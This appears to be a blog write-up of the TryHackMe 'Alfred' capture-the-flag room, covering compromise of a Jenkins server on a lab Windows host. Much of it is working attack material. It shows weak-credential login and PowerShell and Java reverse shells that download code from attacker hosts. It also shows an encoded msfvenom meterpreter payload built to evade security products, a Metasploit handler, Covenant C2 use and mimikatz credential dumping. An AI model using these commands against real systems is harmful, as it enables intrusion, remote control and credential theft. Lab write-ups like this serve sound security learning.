thm-alfred-nl

 

NOTICE: (SPOILER!!) If you would like to solve it by yourself, don’t read further.

Today let’s play a CTF called Alfred at

https://tryhackme.com/room/alfred

Tasks

Title

Alfred

IP Address

10.10.0.173

In this room, we’ll learn how to exploit a common misconfiguration on a widely used automation server(Jenkins – This tool is used to create continuous integration/continuous development pipelines that allow developers to automatically deploy their code once they made change to it). After which, we’ll use an interesting privilege escalation method to get full system access.

Since this is a Windows application, we’ll be using Nishang to gain initial access. The repository contains a useful set of scripts for initial access, enumeration and privilege escalation. In this case, we’ll be using the reverse shell scripts

note : add as last line to Invoke-PowerShellTcp.ps1 script for auto execution

Invoke-PowerShellTcp -Reverse -IPAddress 10.11.3.122 -Port 9001

Please note that this machine does not respond to ping (ICMP) and may take a few minutes to boot up.


#1 How many ports are open?
#2 What is the username and password for the log in panel(in the format username:password)
#3 Find a feature of the tool that allows you to execute commands on the underlying system. When you find this feature, you can use this command to get the reverse shell on your machine and then run it:

powershell -Command “(New-Object System.Net.WebClient).DownloadFile(‘http://10.11.3.122/nc.exe’,’nc.exe’)”; Start-Process nc.exe -NoNewWindow -Argumentlist ‘10.11.3.122 9001 -e cmd.exe’

powershell iex (New-Object Net.WebClient).DownloadString(‘http://10.11.3.122/Invoke-PowerShellTcp.ps1’)

You first need to download the Powershell script, and make it available for the server to download. You can do this by creating a http server with python: python3 -m http.server

#4 What is the user.txt flag?
String host="10.11.1.122";
int port=8044;
String cmd="cmd.exe";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();
Microsoft Windows [Version 10.0.18362.900]
(c) 2019 Microsoft Corporation. All rights reserved.

C:\Windows\system32>e:
E:\>nc -nlvp 8044
listening on [any] 8044 ...
connect to [10.11.3.122] from (UNKNOWN) [10.10.18.2] 49206
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.

C:\Program Files (x86)\Jenkins>whoami
whoami
alfred\bruce

C:\Program Files (x86)\Jenkins>

Enumeration

The first thing we notice is that the server doesn’t respond to ping. I’ve noticed some boxes (rooms) on the platform can take a fair few minutes to boot and have the services loaded so this isn’t a perfect test, but in this instance we can get comms on other TCP ports so likely this is a Windows server with ICMP responses disabled on the host based firewall (a default with Windows 10 I believe!)

ping 10.10.119.245

Basic Nmap Top 1000 Scan

nmap -Pn 10.10.119.245

FULL TCP Scan

nmap -sS -T4 -O -A -vvv -Pn -oA nmap -p- 10.10.119.245

Problems with scan results so I switched to -sT

nmap -sT -T4 -O -A -vvv -Pn -oA nmap1 -p- 10.10.119.245

Exposed Services Overview

TCP 80 Web Server

Sensitive data disclosure:

alfred@wayneenterprises.com

TCP 8080 HTTP Server running Jenkins

The default creds for Jenkins are admin:password

https://docs.openshift.com/container-platform/3.3/using_images/other_images/jenkins.html

However here we can see that default creds are not in use!

So, we capture a login in BURP to prepare for other vectors!

And we send to intruder yet whilst doing this I decided to be cheeky in the browser and just send admin:admin manually…. And guess what! The creds are: admin:admin! A lucky shot with a manual attack but hey, some of this game is art more than science! (I didn’t even get to run intruder,boo! :D)

Running Commands on a Jenkins Server

My first route looking into Jenkins (I don’t remember using this IRL or in a CTF before, but my memory is shocking sometimes so who knows!) the fist feature I looked at was Jenkins script console!

http://10.10.119.245:8080/script

I couldn’t quickly work out how to use this console to went hunting for other avenues (I tried a few things but I felt like I would need to whitebox this to really understand it and I wasn’t in the mood to deploy a new server) so I went hunting for other potential vectors! Luckily in Jenkins the projects BUILD area enables to you execute code! Woohoo! Let’s abuse that built in functionality

We are going to need a reverse shell so we setup a web server with a Nishang shell on TCP 80

Setup a web server

python3 -m http.server 80

Setup a NC Listener

nc -nlvp 1337

Configure Jenkins Project Build Action

powershell iex (New-Object Net.WebClient).DownloadString(‘http://10.8.20.85:80/Invoke-PowerShellTcp.ps1’);Invoke-PowerShellTcp -Reverse -IPAddress 10.8.20.85 -Port 1337

Build the project: click BUILD NOW

Get a shell!

Here can output the user flag file contents!

Upgrading our shell!

Our current shell works but isn’t great so lets’ see if we can upgrade to an meterpreter shell!

Create an Meterpreter Shell using msfvenom! Note we are going to want to encode this to attempt to evade any security products (pro tip: hunt for those before using the limited shell before hand!)

msfvenom –platform windows -p windows/meterpreter/reverse_tcp –encoder x86/shikata_ga_nai LHOST=10.8.20.85 LPORT=3117 -a x86 -f exe -i 3 -o shell.exe

#create a windows payload and web service#create a listener

use exploit/multi/handler

set PAYLOAD windows/meterpreter/reverse_tcp

set LHOST 10.8.20.85

set LPORT 3117

set EXITONSESSION false

exploit -j

#on the jenkinds build page

powershell “(New-Object System.Net.WebClient).Downloadfile(‘http://10.8.20.85:80/shell.exe’,’shell1.exe’)”

#second task

powershell -noprofile -command “Start-Process ‘C:\Program Files (x86)\Jenkins\workspace\project\shell1.exe’”

Now this all looks great! But I wasn’t able to use this shell! I tried and tried and tried and eventually got fed up (again I didn’t want to whitebox this) so what to do! Well I would probably not have used this shell type IRL as standard, I would have launched something into a C2 framework such as POSH C2 or Covenant! For this I decided to use a covenant shell!

(please note I did try following the guided path for this box I the room but I found the command syntax had errors and I couldn’t get the intended route working!)

Covenant C2

Since I first reviewed Covenant there have been major changes and it’s now simply an awesome platform!

https://github.com/cobbr/Covenant

I suggest if you want to understand more about offensive operations, that you look at this and other c2 frameworks!

I’m not going to go into detail about deployment and setup (that’s a learning experience for you! Though I’m sure I’ll blog that separately soon!) so you will need to go and explore on your own or find some guidance on the web! For now I’m going to simply setup a listener and build a launcher, the PSH net core 35 payload works with Jenkins

Run the build

Once we have configured everything we execute the build task and our GRUNT connects back! In Covenant you can now dump creds (LSA Secrets) using the mimikatz module!

You will need to elevate to system and use the covenant mimikatz module one of the SAM hashes is blank (the building administrator account) the other hash would need cracking.

We are able to dump clear text credentials from the box. We could now use these in a variety of ways! I used RDP amongst others but I really wanted to see if I could get a meterpreter shell to complete the box as per the TASK list (the intended route as it were!)

Meterpreter

I got a meterpreter shell running, and attempted to dump tokens so that I could impersonate!

If we launch the shell as ‘Administrator’ /High Integrity

Author – Puckiestyle

 

Geplaatst op

Geef een reactie

Het e-mailadres wordt niet gepubliceerd. Vereiste velden zijn gemarkeerd met *